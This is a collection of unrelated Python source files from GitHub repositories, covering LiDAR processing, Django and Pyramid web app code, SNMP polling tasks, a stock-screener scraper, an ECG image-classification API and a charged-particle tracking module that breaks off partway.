{"seq_id":"32272773494","text":"# coding: utf-8\n# Baptiste Feldmann\nimport os\n\nimport numpy as np\n\nimport plateforme_lidar as pl\nfrom plateforme_lidar import tools # NOTE: assumed import path for the 'tools' helpers (cloudcompare, lastools) used below\n\nworkspace = r'G:\\RENNES1\\Loire_totale_automne2019\\Loire3_Checy-Saint-Dye\\05-Traitements'+'//'\nC2_filename = \"C2_ground_thin_1m.laz\"\nC3_filename = \"C3_ground_thin_1m.laz\"\n\nCC_opt = ['standard', 'LAS', \"Loire45-1\"]\n\n# compute raw bathymetry\nfilterVert = [-4, -0.3]\nquery = tools.cloudcompare.open_file(CC_opt, [workspace + C3_filename, workspace + C2_filename])\ntools.cloudcompare.c2c_dist(query)\nos.remove(tools.cloudcompare.last_file(workspace + C2_filename[0:-4] + \"_20*.laz\"))\ntools.cloudcompare.last_file(workspace + C3_filename[0:-4] + \"_C2C_DIST_*.laz\", C3_filename[0:-4] + \"_C2C.laz\")\n\nC3_data = tools.lastools.read(workspace + C3_filename[0:-4] + \"_C2C.laz\", True)\noutData = tools.lastools.filter_las(C3_data,\n np.logical_and(C3_data.c2c_absolute_distances_z > filterVert[0],\n C3_data.c2c_absolute_distances_z < filterVert[1])\n )\n\ndensity = pl.calculs.compute_density(outData.XYZ, radius=5)\noutData = tools.lastools.filter_las(outData, density > 15)\n\ntools.lastools.WriteLAS(workspace + C3_filename[0:-4] + \"_rawbathy.laz\", outData)\n\nos.remove(workspace+C3_filename[0:-4]+\"_C2C.laz\")\ndel C3_data\ndel outData\n\n# compute water surface\nfilterNormal = 1\nfilterDist = 25\nfilterVert = [0.25, 3.5]\n\ntools.cloudcompare.compute_normals_dip(workspace + C2_filename, CC_opt, 2)\ntools.cloudcompare.last_file(workspace + C2_filename[0:-4] + \"_20*.laz\", C2_filename[0:-4] + \"_normals.laz\")\nquery = tools.cloudcompare.open_file(CC_opt,\n [workspace + C2_filename[0:-4] + \"_normals.laz\",\n workspace + C3_filename[0:-4] + \"_rawbathy.laz\"])\ntools.cloudcompare.c2c_dist(query)\n\nos.remove(tools.cloudcompare.last_file(workspace + C3_filename[0:-4] + \"_rawbathy_20*.laz\"))\ntools.cloudcompare.last_file(workspace + C2_filename[0:-4] + \"_normals_C2C_DIST_*.laz\",\n C2_filename[0:-4] + \"_normals_C2C.laz\")\n\nC2_data = tools.lastools.read(workspace + C2_filename[0:-4] + \"_normals_C2C.laz\", True)\n\nselect1 = C2_data.dip_degrees < filterNormal\nselect2 = (C2_data.c2c_absolute_distances_x**2 + C2_data.c2c_absolute_distances_y**2)**0.5 < filterDist\nselect3 = np.logical_and(C2_data.c2c_absolute_distances_z > filterVert[0],\n C2_data.c2c_absolute_distances_z < filterVert[1])\nselect_all = np.logical_and(np.logical_and(select1, 
select2),\n select3)\n\noutData = tools.lastools.filter_las(C2_data, select_all)\ndensity = pl.calculs.compute_density(outData.XYZ, radius=5)\noutData = tools.lastools.filter_las(outData, density > 15)\n\ntools.lastools.WriteLAS(workspace + C2_filename[0:-4] + \"_watersurface.laz\", outData)\n\nos.remove(workspace+C2_filename[0:-4]+\"_normals.laz\")\nos.remove(workspace+C2_filename[0:-4]+\"_normals_C2C.laz\")\n","repo_name":"p-leroy/lidar_platform","sub_path":"scripts_bfe/C2_extractWaterSurface.py","file_name":"C2_extractWaterSurface.py","file_ext":"py","file_size_in_byte":2962,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"8802467003","text":"#Read a file\nwith open(\"javascript.txt\", mode=\"r\") as s_file:\n words_all = []\n for line in s_file.readlines():\n words = line.strip().split(\" \")\n words_all += words\n\n\n unique_words = set(words_all)\n print(len(words_all))\n print(len(unique_words))\n \n with open(\"unique_words.txt\", mode = \"w\") as writer_file:\n for item in sorted(unique_words):\n writer_file.write(item)\n writer_file.write(\"\\n\")\n\nprint(\"Finished\")","repo_name":"manwar16/pythonPractice","sub_path":"file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13999296898","text":"from django import template\n\nregister = template.Library()\n\n@register.filter\ndef wtf(mapping):\n glml_id = mapping['glml_id']\n from glml.web.models import ANSWER_STUDENT_ID, ANSWER_STUDENT_NAME, District, GRADES, SchoolID, Year \n year = Year.get_current_year()\n try:\n district = District.objects.get(glml_id=glml_id[0], year=year)\n try:\n school = SchoolID.objects.get(glml_id=glml_id[1:3], district=district).school.name\n if school == ANSWER_STUDENT_NAME:\n assert False\n except SchoolID.DoesNotExist:\n school = u'?'\n district = district.glml_id\n if district == ANSWER_STUDENT_ID[0]:\n assert False\n except District.DoesNotExist:\n district = u'?'\n try:\n grade = dict(zip(GRADES.values(), GRADES.keys()))[int(glml_id[3])]\n except:\n grade = u'?'\n if grade == 11:\n grade = u'n %s' % grade\n else:\n grade = u' %s' % grade\n return u'%s, row %s (seems like a%sth grader at %s in district %s)' % (glml_id,\n mapping['row'],\n grade,\n school,\n district)\n\n@register.filter\ndef hash(dictionary, key):\n return dictionary[key]\n\n@register.filter\ndef date_string(date):\n from glml.utils import date_string\n return date_string(date)\n","repo_name":"toddobryan/glml","sub_path":"orig-python-django-src/glml/web/templatetags/glmltags.py","file_name":"glmltags.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"24756999705","text":"\"\"\" SNMP components module\n\"\"\"\nfrom __future__ import absolute_import, unicode_literals\nimport logging\nfrom collections import defaultdict\nfrom pysnmp.hlapi import getCmd, nextCmd, ObjectIdentity, ObjectType\nfrom pysnmp.hlapi import SnmpEngine, CommunityData, UdpTransportTarget, ContextData\nfrom collector.celery import app, mib_view\n\n\ndef get_var_binds(oids):\n \"\"\" Return list of ObjectType class instances\n \"\"\"\n var_binds = []\n\n for oid in oids:\n if isinstance(oid, (tuple, list)):\n ident = ObjectIdentity(*oid)\n if isinstance(oid, str):\n ident = ObjectIdentity(oid)\n\n var_binds.append(ObjectType(ident))\n\n return 
var_binds\n\n\n@app.task(name='snmp.snmp_get', ignore_result=True)\ndef snmp_get(oids, hostname, community='public'):\n \"\"\" PySNMP GET implementation\n \"\"\"\n response = defaultdict(dict)\n\n session = getCmd(SnmpEngine(),\n CommunityData(community, mpModel=1),\n UdpTransportTarget((hostname, 161), timeout=3, retries=1),\n ContextData(),\n *get_var_binds(oids),\n lookupMib=False)\n\n for error_indication, error_status, error_index, var_binds in session:\n if error_indication:\n logging.warning('%s - %s', hostname, error_indication)\n break\n\n if error_status:\n logging.warning('%s - %s at %s',\n hostname,\n error_status.prettyPrint(),\n error_index and var_binds[int(error_index)-1][0] or '?')\n break\n\n for var_name, var_value in var_binds:\n (_, object_name, object_id) = mib_view.getNodeLocation(var_name)\n\n response[object_id.prettyPrint()].update({object_name: var_value.prettyPrint()})\n\n return dict(response)\n\n\n@app.task(name='snmp.snmp_walk', ignore_result=True)\ndef snmp_walk(oids, hostname, community='public'):\n \"\"\" PySNMP WALK implementation\n \"\"\"\n response = defaultdict(dict)\n\n session = nextCmd(SnmpEngine(),\n CommunityData(community, mpModel=1),\n UdpTransportTarget((hostname, 161), timeout=3, retries=1),\n ContextData(),\n *get_var_binds(oids),\n lexicographicMode=False,\n lookupMib=False)\n\n for error_indication, error_status, error_index, var_binds in session:\n if error_indication:\n logging.warning('%s - %s', hostname, error_indication)\n break\n\n if error_status:\n logging.warning('%s - %s at %s',\n hostname,\n error_status.prettyPrint(),\n error_index and var_binds[int(error_index)-1][0] or '?')\n break\n\n for var_name, var_value in var_binds:\n (_, object_name, object_id) = mib_view.getNodeLocation(var_name)\n\n response[object_id.prettyPrint()].update({object_name: var_value.prettyPrint()})\n\n return dict(response)\n","repo_name":"hramcovdv/collector2","sub_path":"snmp/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":3087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31514532498","text":"from bs4 import BeautifulSoup\nimport requests\nimport csv\n\nURL = \"https://www.screener.in/screens/234/bluest-of-the-blue-chips/\"\nheaders= {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}\n\n\npage = requests.get(URL, headers=headers)\n\nsoup1 = BeautifulSoup(page.content, \"html.parser\")\n\nsoup2 = BeautifulSoup(soup1.prettify(), \"html.parser\")\n\ntable = soup2.find('table',class_ = 'data-table text-nowrap striped mark-visited').find_all('tr')\n\nprint(table[1])\n\n# Create a Timestamp for your output to track when data was collected\n\nimport datetime\n\ntoday = datetime.date.today()\n\nprint(today)\n\nname=\"Spaj Industries\"\nprice=1000\nmarketcap=15000\nheader= ['Date','Company Name', 'Price', 'Market Cap']\ndata=[today, name, price, marketcap]\n\nwith open('BlueChipDataset.csv', 'w', newline='', encoding='UTF8') as f:\n writer = csv.writer(f)\n writer.writerow(header)\n writer.writerow(data)\nimport pandas as pd\n\ndf = pd.read_csv(r'D:\\User Data\\Desktop\\PycharmProjects\\MEDUSA\\BlueChipDataset.csv')\nfor t in table[1:15]:\n name = t.find('a').get_text().strip()\n xyz = t.find_all('td')\n price = xyz[2].get_text().strip()\n marketcap = xyz[4].get_text().strip()\n data = [today, name, price, marketcap]\n with open('BlueChipDataset.csv', 'a+', newline='', encoding='UTF8') as f:\n 
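# Append one row per scraped company; the header row was written earlier in 'w' mode.\n 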
writer = csv.writer(f)\n writer.writerow(data)\n\nprint(df)","repo_name":"shubhking51/Attack-Titan-Scraper","sub_path":"BlueChipWeb.py","file_name":"BlueChipWeb.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34784340415","text":"from rotarran.application.settings.paths import paths_setting\n\n\ndef make_settings(settings, paths):\n project(settings, paths)\n paths_setting(settings, paths)\n database(settings, paths)\n logger(settings, paths)\n debug(settings, paths)\n\n\ndef database(settings, paths):\n settings['db:type'] = 'postgresql'\n settings['db:login'] = 'rotarran'\n settings['db:password'] = 'rotarran'\n settings['db:host'] = 'postgres'\n settings['db:name'] = 'rotarran'\n settings['db:port'] = '5432'\n settings['db:options'] = {}\n\n with paths.context('data') as data:\n data.set('sqlite_db', 'data', 'sqlite3.db')\n\n\ndef project(settings, paths):\n settings['secret'] = 'asdasdasdasdweq312iuashi1u2h13o2'\n settings['package:name'] = 'rotarran'\n\n\ndef debug(settings, paths):\n settings['debug'] = True\n settings['pyramid.reload_templates'] = True\n settings['pyramid.debug_notfound'] = True\n settings['pyramid.debug_routematch'] = True\n\n\ndef logger(settings, paths):\n settings['loggers'] = {\n 'loggers': {\n 'keys': 'root, sqlalchemy, alembic',\n },\n 'handlers': {\n 'keys': 'console, all',\n },\n 'formatters': {\n 'keys': 'generic',\n },\n 'logger_root': {\n 'level': 'INFO',\n 'handlers': 'console, all',\n },\n 'logger_sqlalchemy': {\n 'level': 'INFO',\n 'handlers': 'all',\n 'qualname': 'sqlalchemy.engine',\n 'propagate': '0',\n },\n 'logger_alembic': {\n 'level': 'INFO',\n 'handlers': 'all',\n 'qualname': 'alembic',\n 'propagate': '0',\n },\n 'handler_console': {\n 'class': 'StreamHandler',\n 'args': '(sys.stderr,)',\n 'level': 'NOTSET',\n 'formatter': 'generic',\n },\n 'handler_all': {\n 'class': 'FileHandler',\n 'args': \"('{}', 'a')\".format(paths.get('logs:all')),\n 'level': 'NOTSET',\n 'formatter': 'generic',\n },\n 'formatter_generic': {\n 'format': '%%(asctime)s %%(levelname)-5.5s [%%(name)s][%%(threadName)s] %%(message)s',\n },\n }\n","repo_name":"socek/rotarran","sub_path":"backend/code/rotarran/application/settings/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35360742985","text":"from pathlib import Path\nimport os\nimport csv\nimport json\n\n# get current working directory\n # rootPath=Path(makelist)\n # rootPath=rootPath.parent\n # os.chdir(str(rootPath))\nrootPath=Path(os.getcwd())\n\n# URL template for desktop slide 1080p video\nurlTemplate=['https://mediastream.cern.ch/MediaArchive/Video/Public/WebLectures/2014/(%eventID)/(%eventID)_desktop_slides_1080p_4000.mp4',\n 'https://mediastream.cern.ch/MediaArchive/Video/Public/WebLectures/2014/(%eventID)/(%eventID)_desktop_camera_1080p_4000.mp4',\n 'https://mediastream.cern.ch/MediaArchive/Video/Public/WebLectures/2014/(%eventID)/lecture.json',\n 'https://mediastream.cern.ch/MediaArchive/Video/Public/WebLectures/2014/(%eventID)/thumbs/(%picName)']\nlocalname=['(%lectureID).(%counter)_slides_1080p.mp4',\n '(%lectureID).(%counter)_camera_1080p.mp4',\n 'lecture.json',\n 'thumbs/(%picName)']\n\n# check if 'downloadList.csv' exists\np=Path('downloadList.csv')\nif not p.exists():\n p.open('w').close()\n\n# Read URL list from 'downloadList.csv' first\nURLlist=set()\nwith 
open('downloadList.csv',newline='') as f:\n reader=csv.reader(f,delimiter=';')\n try:\n for status, name, URL in reader:\n URLlist.add(URL)\n except ValueError:\n print ('Error: \"downloadList.csv\" end with new line. This may lead to repeated download.\\n',\n ' Please delete the new line and restart this program.')\n raise ValueError\n\n# write download list to 'downlodaList.csv' using csv.writer\nwith open('downloadList.csv','a') as f:\n csvwriter = csv.writer(f,delimiter=';')\n for idList in rootPath.glob('**/eventID'):\n # find all 'eventID' files in sub-directories and read the event id\n print (idList.parent.relative_to(rootPath))\n # generate relative path of 'eventID'\n lectureID=str(idList.parent.relative_to(rootPath))[0:2]\n with idList.open() as eventID:\n counter=0\n for ID in eventID.readlines():\n if ID!='\\n':\n counter=counter+1\n # generate download entry information\n for i in [0,1,2]:\n item=['{: <50}'.format('Queued'),\n './'+str(idList.parent.relative_to(rootPath))+'/'\n +str(counter)+'/'\n +localname[i].replace('(%lectureID)',lectureID)\n .replace('(%counter)',str(counter)),\n urlTemplate[i].replace('(%eventID)',ID[:-1])]\n # write to the file\n if item[2] not in URLlist:\n URLlist.add(item[2])\n csvwriter.writerow(item)\n \n # try to read lecture.json and add pic entry\n jfile=Path(str(idList.parent)+'/'+str(counter)+'/lecture.json')\n if jfile.exists():\n with jfile.open() as f:\n lecture = json.load(f)\n lecture = lecture['lecture']['thumbs']\n for x in lecture:\n item=['{: <50}'.format('Queued'),\n './'+str(idList.parent.relative_to(rootPath))+'/'\n +str(counter)+'/'\n +localname[3].replace('(%picName)',x['src']),\n urlTemplate[3].replace('(%eventID)',ID[:-1])\n .replace('(%picName)',x['src'])]\n if item[2] not in URLlist:\n URLlist.add(item[2])\n csvwriter.writerow(item)\n # end {if jfile}\n #end {if ID}\n # end {for ID}\n # end {with eventID}\n # end {for idList}\n# end {with f}\n\n\n\n","repo_name":"George-Gate/CERN-Video-Downloader","sub_path":"MakeDownloadList.py","file_name":"MakeDownloadList.py","file_ext":"py","file_size_in_byte":4095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37931992806","text":"from _dataset import read_gamma, read_solar, read_mnist\n\n\n# Holds all datasets for testing/training\nclass Data(object):\n def __init__(self):\n self.mnist_X = None\n self.mnist_Y = None\n self.mnist_x = None\n self.mnist_y = None\n self.gamma_X = None\n self.gamma_Y = None\n self.gamma_x = None\n self.gamma_y = None\n self.solar_X = None\n self.solar_Y = None\n self.solar_x = None\n self.solar_y = None\n self.load()\n\n # reads data from file(s) for program use\n def load(self):\n self.gamma_X, self.gamma_Y, self.gamma_x, self.gamma_y = read_gamma.read()\n self.mnist_X, self.mnist_Y, self.mnist_x, self.mnist_y = read_mnist.read()\n self.solar_X, self.solar_Y, self.solar_x, self.solar_y = read_solar.read()\n print('')\n\n # if randomizing tests, use this function\n def get(self, i):\n switcher = {\n 0: self.gamma(),\n 1: self.mnist(),\n 2: self.solar(),\n }\n return switcher.get(i)\n\n # which dataset are we using?\n def using(self,i):\n switcher = {\n 0: 'Gamma Ray',\n 1: 'MNIST',\n 2: 'Solar',\n }\n return switcher.get(i, 'rip')\n\n # the number of datasets in use\n def sets(self):\n return 3\n\n def gamma(self):\n return self.gamma_X, self.gamma_Y, self.gamma_x, self.gamma_y\n\n def mnist(self):\n return self.mnist_X, self.mnist_Y, self.mnist_x, self.mnist_y\n\n def solar(self):\n return 
self.solar_X, self.solar_Y, self.solar_x, self.solar_y\n","repo_name":"mahdafr/19w_cs5361-labs","sub_path":"lab4/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11447552137","text":"from fastapi import FastAPI, UploadFile\nfrom fastapi.responses import FileResponse\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom PIL import Image\nfrom torchvision.transforms import Compose, Resize, ToTensor, Normalize\nimport torch\nfrom io import BytesIO\nfrom ecg_model.grad import ecg_grad\nfrom ecg_model.save_load_model import load_model_url\n\n\ndef transformation(image):\n transform = Compose([\n Resize((224, 224)),\n ToTensor(),\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ])\n return transform(image)\n\napp = FastAPI()\n\n\n# Allowing all middleware is optional, but good practice for dev purposes\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"], # Allows all origins\n allow_credentials=True,\n allow_methods=[\"*\"], # Allows all methods\n allow_headers=[\"*\"], # Allows all headers\n)\n\n@app.post(\"/predict\")\nasync def predict(file: UploadFile, model_url):\n class_names = ['Abnormal', 'Normal']\n\n file_request = await file.read()\n app.state.model = load_model_url(model_url)\n X_img = Image.open(BytesIO(file_request)).convert('RGB')\n img_processed = transformation(X_img)\n img_processed = img_processed.unsqueeze(0)\n\n # Set the model to evaluation mode\n app.state.model.eval()\n\n # Forward pass\n with torch.no_grad():\n output = app.state.model(img_processed)\n\n probabilities = torch.nn.functional.softmax(output, dim=1)\n predicted_prob, predicted_label = torch.max(probabilities, 1)\n predicted_class = class_names[predicted_label.item()]\n predicted_prob = round(predicted_prob.item() * 100, 1)\n\n ecg_grad(app.state.model, img_processed, X_img)\n\n response = FileResponse(\"ecg_model/api/grad_cam.jpg\")\n response.headers[\"prediction\"] = predicted_class\n response.headers[\"confidence\"] = f\"{predicted_prob}%\"\n return response\n","repo_name":"Dsacras/ecg_photo","sub_path":"ecg_model/api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38052125641","text":"from django.urls import path\nfrom . 
import views\n\napp_name = 'unit'\n\nurlpatterns = [\n    # post views\n    path('search/', views.airman_search, name='airman_search'),\n    # path('search/', views.airman_first_name_search(), name='airman_first_name_search'),\n    # NOTE: the four URL converters below were stripped to '////' by HTML processing;\n    # '<int:year>/<int:month>/<int:day>/<slug:airman>/' is a best-guess reconstruction.\n    path('<int:year>/<int:month>/<int:day>/<slug:airman>/',\n         views.airman_detail,\n         name='airman_detail'),\n    path('failures/', views.FailureListView.as_view(), name='all_failure_list'),\n    path('profiles/', views.ProfileListView.as_view(), name='all_profile_list'),\n    path('ptls/', views.PhysicalTrainingLeaderListView.as_view(), name='all_ptl_list'),\n    path('ufpms/', views.UnitFitnessProgramManagerListView.as_view(), name='all_ufpm_list'),\n    path('', views.AirmanListView.as_view(), name='airman_list'),\n]\n","repo_name":"lopezjronald/django-unit-fitness-program","sub_path":"asts_fitness_program/unit/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}{"seq_id":"4338169904","text":"def merge(list_of_lists):\n    merged_list = []\n\n    for list in list_of_lists:\n        for item in list:\n            merged_list.append(item)\n\n    return merged_list\n\n\nctrlSamples = []\ntestSamples = []\nclasses = []\n\ndataSet = open(\"X_train.txt\", \"r\")\n\nfor line in dataSet:\n    line = line.rstrip(\"\\n\")\n    line = line.rstrip(\"\\r\")\n    attributes = line.split(' ')\n    attributes = list(filter(lambda a: a != '', attributes))  # materialize the filter: len() and reuse below fail on a bare filter object\n    ctrlSamples.append(attributes)\n\ndataSet.close()\n\ndataSet = open(\"y_train.txt\", \"r\")\n\nfor line in dataSet:\n    line = line.rstrip(\"\\n\")\n    line = line.rstrip(\"\\r\")\n    classes.append(str(int(line) - 1))\n\ndataSet.close()\n\ndataSet = open(\"X_test.txt\", \"r\")\n\nfor line in dataSet:\n    line = line.rstrip(\"\\n\")\n    line = line.rstrip(\"\\r\")\n    attributes = line.split(' ')\n    attributes = list(filter(lambda a: a != '', attributes))\n    testSamples.append(attributes)\n\ndataSet.close()\n\nctrl = len(ctrlSamples)\ntest = len(testSamples)\nattr = len(ctrlSamples[0])\n\nctrlSamples = [float(i) for i in merge(ctrlSamples)]\ntestSamples = [float(i) for i in merge(testSamples)]\nclasses = [int(i) for i in classes]\n\ntext = open(\"human_activity_recognition_using_smartphones.parse\", \"w\")\n\nfor item in merge([ctrlSamples, testSamples, classes]):\n    text.write(str(item) + '\\n')\n\ntext.close()\n\nconfig = open(\"human_activity_recognition_using_smartphones.cfg\", \"w\")\n\nconfig.write(str(ctrl) + \" # ctrl samples\\n\")\nconfig.write(str(test) + \" # test samples\\n\")\nconfig.write(str(attr) + \" # features\\n\")\nconfig.write(\"6 # classes\\n\")\n\nconfig.close()","repo_name":"joaomiguelvieira/kNNSim","sub_path":"datasets/5_human_activity_recognition_using_smartphones/parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}{"seq_id":"30325329165","text":"# -*- coding: iso-8859-15 -*-\n\nimport requests\nimport json\n\nimport config\n\n\ndef temperature(data):\n    temperature = []\n    try:\n        for url in config.PLUGINS['temperature']['urls']:\n            temp_json = json.loads(requests.get(url, timeout=5).text)\n            for loc, temp in temp_json.items():\n                temperature_item = {\n                    'value': temp,\n                    'unit': '°C',\n                    'location': loc\n                }\n                temperature.append(temperature_item)\n    except Exception as e:\n        print(\"TEMPERATURE: Unexpected error\")\n        print(e)\n\n    data['sensors']['temperature'] = temperature\n\n    return data\n\n\ndef temperature_html(data, args):\n    if 'sensors' in data and 'temperature' in data['sensors']:\n        
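# A hedged usage sketch (input shape mirrors temperature() above; values invented):\n        # temperature_html({'sensors': {'temperature': [{'value': 21.5, 'unit': '°C', 'location': 'lab'}]}}, {})\n        # would copy that list into args['temperatures'].\n        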
args['temperatures'] = data['sensors']['temperature']\n\n return args\n","repo_name":"Bytespeicher/space-status","sub_path":"plugins/temperature.py","file_name":"temperature.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"72963626113","text":"\"\"\"\n粒子和粒子跟踪\n\"\"\"\nfrom typing import List, Tuple\n\nimport numpy as np\n\nfrom cctpy.abstract_classes import Plotable, Magnet, LocalCoordinateSystem\nfrom cctpy.baseutils import Vectors, Equal, Stream, Ellipse\nfrom cctpy.constant import MM, LIGHT_SPEED, Protons, ZI\n\n\nclass RunningParticle(Plotable):\n \"\"\"\n 在全局坐标系中运动的一个粒子\n position 位置,三维矢量,单位 [m, m, m]\n velocity 速度,三位矢量,单位 [m/s, m/s, m/s]\n relativistic_mass 相对论质量,又称为动质量,单位 kg, M=Mo/√(1-v^2/c^2)\n e 电荷量,单位 C 库伦\n speed 速率,单位 m/s\n distance 运动距离,单位 m\n \"\"\"\n\n def __init__(self, position: np.ndarray, velocity: np.ndarray,\n relativistic_mass: float, e: float, speed: float, distance: float = 0.0):\n \"\"\"\n 在全局坐标系中运动的一个粒子\n Parameters\n ----------\n position 位置,三维矢量,单位 [m, m, m]\n velocity 速度,三位矢量,单位 [m/s, m/s, m/s]\n relativistic_mass 相对论质量,又称为动质量,单位 kg, M=Mo/√(1-v^2/c^2)\n e 电荷量,单位 C 库伦\n speed 速率,单位 m/s\n distance 运动距离,单位 m\n \"\"\"\n self.position = position\n self.velocity = velocity\n self.relativistic_mass = relativistic_mass\n self.e = e\n self.speed = speed\n self.distance = distance\n\n def run_self_in_magnetic_field(self, magnetic_field: np.ndarray, footstep: float = 1 * MM) -> None:\n \"\"\"\n 粒子在磁场 magnetic_field 中运动 footstep 长度\n Parameters\n ----------\n magnetic_field 磁场,看作恒定场\n footstep 步长,默认 1 MM\n\n Returns None\n -------\n \"\"\"\n # 计算受力 qvb\n f = self.e * (np.cross(self.velocity, magnetic_field))\n # 计算加速度 a = f/m\n a = f / self.relativistic_mass\n # 计算运动时间\n t = footstep / self.speed\n # 位置变化\n self.position += t * self.velocity\n # 速度变化\n self.velocity += t * a\n # 运动距离\n self.distance += footstep\n\n def copy(self):\n \"\"\"\n 深拷贝粒子\n Returns 深拷贝粒子\n -------\n\n \"\"\"\n return RunningParticle(\n self.position.copy(),\n self.velocity.copy(),\n self.relativistic_mass,\n self.e,\n self.speed,\n self.distance,\n )\n\n def line_and_color(self, describe: str = 'r.') -> List[Tuple[np.ndarray, str]]:\n return [\n ([self.position], describe)\n ]\n\n def compute_scalar_momentum(self) -> float:\n \"\"\"\n 获得标量动量\n Returns 标量动量\n -------\n\n \"\"\"\n return self.speed * self.relativistic_mass\n\n def change_scalar_momentum(self, scalar_momentum: float) -> None:\n \"\"\"\n 改变粒子的标量动量。\n 注意:真正改变的是粒子的速度和动质量\n 这个方法用于生成一组动量分散的粒子\n\n scalar_momentum 标量动量\n Returns None\n -------\n\n \"\"\"\n # 先求 静止质量\n m0 = self.relativistic_mass * np.sqrt(1 - (self.speed ** 2) / (LIGHT_SPEED ** 2))\n # 求新的速率\n new_speed = scalar_momentum / np.sqrt(m0 ** 2 + (scalar_momentum / LIGHT_SPEED) ** 2)\n # 求新的动质量\n new_relativistic_mass = m0 / np.sqrt(1 - (new_speed / LIGHT_SPEED) ** 2)\n # 求新的速度\n new_velocity = Vectors.update_length(self.velocity, new_speed)\n\n # 写入\n self.relativistic_mass = new_relativistic_mass\n self.speed = new_speed\n self.velocity = new_velocity\n\n # 验证\n Equal.require_float_equal(\n scalar_momentum, self.compute_scalar_momentum(),\n f\"RunningParticle::change_scalar_momentum异常,scalar_momentum{scalar_momentum}!=self.compute_scalar_momentum{self.compute_scalar_momentum}\",\n err=1e-6\n )\n\n Equal.require_float_equal(\n self.speed, Vectors.length(self.velocity),\n 
f\"RunningParticle::change_scalar_momentum异常,self.speed{self.speed}!=Vectors.length(self.velocity){Vectors.length(self.velocity)}\"\n )\n\n def get_natural_coordinate_system(self, y_direction: np.ndarray = ZI) -> LocalCoordinateSystem:\n return LocalCoordinateSystem.create_by_y_and_z_direction(self.position, y_direction, self.velocity)\n\n def __str__(self) -> str:\n return f\"p={self.position},v={self.velocity},v0={self.speed}\"\n\n\nclass ParticleRunner:\n \"\"\"\n 粒子运动工具类\n \"\"\"\n\n @staticmethod\n def run_only(p: RunningParticle, m: Magnet, length: float, footstep: float = 1 * MM) -> None:\n \"\"\"\n 让粒子 p 在磁场 m 中运动 length 距离,步长 footstep\n Parameters\n ----------\n p 粒子\n m 磁场\n length 运动长度\n footstep 步长\n\n Returns None\n -------\n\n \"\"\"\n distance = 0.0\n while distance < length:\n p.run_self_in_magnetic_field(m.magnetic_field_at(p.position), footstep=footstep)\n distance += footstep\n\n @staticmethod\n def run_get_trajectory(p: RunningParticle, m: Magnet, length: float, footstep: float = 1 * MM) -> np.ndarray:\n \"\"\"\n 让粒子 p 在磁场 m 中运动 length 距离,步长 footstep\n 获得粒子的轨迹\n Parameters\n ----------\n p 粒子\n m 磁场\n length 运动长度\n footstep 步长\n\n Returns 轨迹 np.ndarray,是三维点的数组\n -------\n\n \"\"\"\n trajectory = np.empty((int(length / footstep) + 1, 3))\n trajectory[0, :] = p.position.copy()\n\n i = 1\n distance = 0.0\n while distance < length:\n p.run_self_in_magnetic_field(m.magnetic_field_at(p.position), footstep=footstep)\n distance += footstep\n trajectory[i, :] = p.position.copy()\n i += 1\n\n return trajectory[0:i, :]\n\n @staticmethod\n def run_get_all_info(p: RunningParticle, m: Magnet, length: float, footstep: float = 1 * MM) \\\n -> List[RunningParticle]:\n \"\"\"\n 让粒子 p 在磁场 m 中运动 length 距离,步长 footstep\n 获得粒子全部信息\n Parameters\n ----------\n p 粒子\n m 磁场\n length 运动长度\n footstep 步长\n\n Returns 每一步处的粒子全部信息 List[RunningParticle]\n -------\n\n \"\"\"\n all_info: List[RunningParticle] = [p.copy()]\n distance = 0.0\n while distance < length:\n p.run_self_in_magnetic_field(m.magnetic_field_at(p.position), footstep=footstep)\n distance += footstep\n all_info.append(p.copy())\n\n return all_info\n\n @staticmethod\n def run_ps_only_cpu0(ps: List[RunningParticle], m: Magnet, length: float, footstep: float = 1 * MM) -> None:\n \"\"\"\n 让粒子群 ps 在磁场 m 中运动 length 距离,步长 footstep\n CPU 计算 单线程\n Parameters\n ----------\n ps 一群粒子\n m 磁场\n length 运动长度\n footstep 步长\n\n\n Returns None\n -------\n\n \"\"\"\n for p in ps:\n ParticleRunner.run_only(p, m, length, footstep)\n\n\nclass PhaseSpaceParticle:\n XXP_PLANE = 1\n YYP_PLANE = 2\n\n \"\"\"\n 相空间中的粒子,6个坐标 x xp y yp z delta\n \"\"\"\n\n def __init__(self, x: float, xp: float, y: float, yp: float, z: float, delta: float):\n self.x = x\n self.xp = xp\n self.y = y\n self.yp = yp\n self.z = z\n self.delta = delta\n\n def project_to_xxp_plane(self) -> np.ndarray:\n \"\"\"\n 投影到 x-xp 